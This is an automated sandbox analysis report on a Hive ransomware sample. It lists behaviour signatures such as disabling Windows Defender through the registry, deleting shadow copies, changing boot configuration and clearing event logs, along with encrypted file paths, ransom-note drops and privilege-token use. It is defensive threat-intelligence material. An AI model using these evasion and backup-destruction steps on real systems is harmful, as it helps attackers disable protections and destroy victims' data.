Malware Analysis Report

2024-10-16 03:12

Sample ID 220112-vbydqaddbn
Target d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.7z
SHA256 8911b5d28e47048d4db01cefb105a74b070fc1126e5952bb4e383dcc1330a927
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8911b5d28e47048d4db01cefb105a74b070fc1126e5952bb4e383dcc1330a927

Threat Level: Known bad

The file d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.7z was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Deletes Windows Defender Definitions

Hive

Modifies security service

Modifies boot configuration data using bcdedit

Clears Windows event logs

Deletes shadow copies

Reads user/profile data of web browsers

Launches sc.exe

Drops file in Program Files directory

Suspicious use of WriteProcessMemory

Runs net.exe

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 16:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 16:49

Reported

2022-01-12 16:54

Platform

win7-en-20211208

Max time kernel

190s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_HfWYPhQrYmA0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_riMptI5m7HU0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\init.js | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\css\settings.css | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Media Player\es-ES\WMPDMCCore.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\slideShow.html | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File created | C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_QVae35UIwqM0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_t0FT4y1WQNc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2YkZ_mCLLAQ0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.IE.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ZyruyCrLZko0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\kk.txt.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_lR-LH5BGSzA0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_dG1gKCL2XYE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115876.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_h69GoWNI8Rg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_zuO3f0bQsTo0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FRAR\MSB1FRAR.ITS.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_EdAzsFPoOrI0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0283209.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_8QcjDG7rB2k0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.DPV.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_TivHynjiEpY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\OrielMergeLetter.Dotx.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_hlIDUXEtFVY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_sPLEMuIXMUg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_6rB34lbx0Jg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_GNPLvFP_zFw0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H__x8qpQUJIsE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01631_.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2zSkv8zaRpQ0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105588.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_vnpVUI0zmOQ0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ydqZ9Eibfxs0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask.wmv | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_Jb5GmcdELIA0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2OXoKfEVGg40.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Excel.en-us\ExcelMUI.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_XmlTqu87f5s0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_MebdR_icuSY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_k47sWypKUJ00.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_W571iuh6NH40.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\settings.css | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Vienna.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_tf-jit-Efes0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_bMr12DL6XJI0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ZU91AzFYbw40.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309902.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_UlMp6y1OYVs0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\gadget.xml | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_4AjEF-b91xo0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Internet Explorer\SIGNUP\install.ins.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_1CNpioIEzQk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_0Z_gQNoQDd80.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_MfeouGtus0c0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105250.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_A_J90vBBQkk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Godthab.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_m1IaTRXRn340.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1308 wrote to memory of 588 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 588 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 588 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 588 wrote to memory of 544 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 588 wrote to memory of 544 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 588 wrote to memory of 544 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1116 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1116 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
